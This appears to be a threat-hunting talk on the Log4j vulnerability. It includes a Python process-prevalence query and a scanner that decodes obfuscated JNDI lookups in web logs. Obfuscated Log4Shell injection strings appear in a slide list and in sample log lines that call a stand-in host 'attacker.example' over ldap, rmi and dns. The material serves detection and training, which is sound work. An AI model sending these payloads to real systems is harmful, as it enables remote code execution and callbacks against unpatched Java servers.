Real-World Example: A Walkthrough of Interpreting Results
Threat Hunting for Log4j
Log4j: Anatomy
• log4j is a popular logging package for Java (other logging packages: SLF4J/Logback)
• Lookups: "Lookups provide a way to add values to the Log4j configuration at arbitrary places"
• JNDI: "The JNDI API is a generic API for accessing any naming or directory service"
• log4j-jndi-be-gone by nccgroup
The Art of Querying: Techniques for Effective Threat Hunting
1. clear understanding
2. compound query: check for netflow traffic and cross-correlate it with DNS query and proxy logs.
3. statistical query: check the prevalence of each process across all users, then check the prevalence of the process per user by counting the combination of process and user.
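The statistical query above, worked through in code. This is an added example, not material from the original slides: the process-creation events are constructed (user, process) pairs, and the thresholds `rare_users` and `rare_runs` are assumed cut-offs a hunter would tune to their own environment. Step 1 counts how many distinct users ran each process; step 2 counts each (process, user) combination, which surfaces a common process being run by an unusual user.

```python
from collections import Counter, defaultdict

# Constructed process-creation telemetry as (user, process) pairs; not real data.
# chrome.exe is run by everyone, powershell.exe by two analysts and once by a
# service account, and java.exe / certutil.exe only by that service account.
EVENTS = (
    [(u, "chrome.exe") for u in ("alice", "bob", "carol", "dave") for _ in range(3)]
    + [("alice", "powershell.exe")] * 4
    + [("bob", "powershell.exe")] * 2
    + [("svc-app", "powershell.exe")]
    + [("svc-app", "java.exe")] * 3
    + [("svc-app", "certutil.exe")]
)


def process_prevalence(events):
    """Step 1: number of distinct users that ran each process."""
    users_by_process = defaultdict(set)
    for user, process in events:
        users_by_process[process].add(user)
    return {process: len(users) for process, users in users_by_process.items()}


def process_user_counts(events):
    """Step 2: how many times each (process, user) combination occurred."""
    return Counter((process, user) for user, process in events)


def hunting_leads(events, rare_users=1, rare_runs=1):
    """Two kinds of lead: processes seen for at most `rare_users` users, and
    (process, user) pairs seen at most `rare_runs` times for a process that is
    otherwise common (prevalence above `rare_users`)."""
    prevalence = process_prevalence(events)
    pairs = process_user_counts(events)
    rare_processes = sorted(p for p, n in prevalence.items() if n <= rare_users)
    rare_pairs = sorted(
        (p, u)
        for (p, u), n in pairs.items()
        if n <= rare_runs and prevalence[p] > rare_users
    )
    return rare_processes, rare_pairs


if __name__ == "__main__":
    rare_processes, rare_pairs = hunting_leads(EVENTS)
    print("processes with low prevalence:", rare_processes)
    print("common processes run by an unusual user:", rare_pairs)
```

On the constructed data the first list is `certutil.exe` and `java.exe` (one user each) and the second is `("powershell.exe", "svc-app")`: PowerShell is common in the estate, but a service account launching it once is the combination worth pulling the command line for. Tune the cut-offs to the size of the population; on a fleet of thousands of hosts a prevalence of one is a much stronger signal than on a lab network.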
Know your environment and data
• Variation
• Obfuscation
• Common Information Model
• Attacker Trickery
1. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://
   ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}
2. ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://
   ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://
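A detection that survives the two obfuscation styles listed above, as an added example rather than code from the original slides or from any of the tools it names. It resolves the `${...:-x}` default-value trick and the `${lower:x}`/`${upper:x}` case lookups innermost-first until the string stops changing, then looks for the collapsed `${jndi:<scheme>://` form; a plain search for the literal string `jndi` would miss both variants. The access-log lines are constructed for the example, and the `attacker.example` hostnames are made up, not indicators from any incident.

```python
import re
from urllib.parse import unquote

# Constructed web-server access-log lines (not from any real incident).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/b}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${env:JAVA_HOME:-nothing} just a default lookup"',
]

# ${name:-default}: a lookup with a default value. With an empty lookup name
# (the "${::-j}" trick) or an unresolvable one, Log4j substitutes the default.
DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# ${lower:x} / ${upper:x}: case-conversion lookups.
CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
# After normalisation the payload collapses to ${jndi:<scheme>://...}. Log4j
# matches lookup names case-insensitively, so "jNdI" must count as a hit.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)", re.IGNORECASE)


def normalize(text, max_rounds=20):
    """Resolve nested default-value and case lookups innermost-first until the
    string stops changing. This approximates, not reproduces, Log4j's own
    substitution: a resolvable lookup such as ${env:HOME:-x} would really
    expand to the environment value, but taking the default is enough for
    detection, because an attacker picks lookups that fail on purpose."""
    for _ in range(max_rounds):
        new = DEFAULT_RE.sub(lambda m: m.group(1), text)
        new = CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            new,
        )
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """Return (scheme, normalized_line) if the line carries a JNDI lookup, else None."""
    normalized = normalize(unquote(line))  # decode %24%7B... first, then resolve lookups
    m = JNDI_RE.search(normalized)
    if not m:
        return None
    return m.group(1).lower(), normalized


def hunt(lines):
    """Indexes and JNDI schemes of the lines that should be triaged."""
    hits = []
    for i, line in enumerate(lines):
        hit = scan_line(line)
        if hit:
            hits.append((i, hit[0]))
    return hits


if __name__ == "__main__":
    for i, scheme in hunt(SAMPLE_LOG):
        print(f"line {i}: jndi scheme={scheme}")
        print("   ", scan_line(SAMPLE_LOG[i])[1])
```

Run against the sample, lines 1 to 4 are flagged (schemes ldap, ldap, rmi, dns) and the benign `${env:JAVA_HOME:-nothing}` line is not, so resolving defaults does not by itself create a hit. The scheme is worth keeping in the result: ldap and rmi hits deserve a check of outbound connections from the Java host, while a dns scheme is usually a callback probe and tells you which hosts an attacker has already confirmed as vulnerable. Normalisation is bounded by `max_rounds` so a deliberately deep nesting cannot stall the scanner.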
Hunt for similar Vulnerabilities
• Threat-intel based hunting allows you to step into several roles
• Hunt for deserialization vulnerabilities with heyserial, ysoserial, marshalsec
• Hunt for exposed devices
• Check “ ” by Microsoft for generic inventory and vulnerabilities
Questions?